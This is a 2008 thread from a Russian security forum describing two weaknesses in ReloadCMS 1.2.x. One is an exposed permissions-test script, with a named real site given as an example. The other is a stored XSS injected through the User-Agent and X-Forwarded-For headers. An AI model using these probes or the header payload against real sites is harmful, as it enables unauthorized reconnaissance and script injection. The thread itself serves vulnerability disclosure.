ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

ReloadCMS (просмотр директорий и прав на запись)
  #1  
Старый 17.12.2008, 09:24
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию ReloadCMS (просмотр директорий и прав на запись)

ReloadCMS (просмотр директорий и прав на запись)
Уязвимый продукт: ReloadCMS 1.2.* (более не тестировал)
CMS без MySQL.
Хороший способ, чтобы узнать где какие права стоят.

Example:
Код:
http://site.com/path_to_cms/tools/rights_test.php
Немного погуглив нашел пример такого сайта:
Код:
http://ziggyred.com/test/tools/rights_test.php
 
Ответить с цитированием

  #2  
Старый 17.12.2008, 11:59
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

это не баг, это фича (c) =)

Вот еще активная XSS (в статистике сайта):
Код:
GET / HTTP/1.0
User-Agent: <script>alert()</script>
X-Forwarded-For: <script>alert()</script>
Host: localhost
Connection: close
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ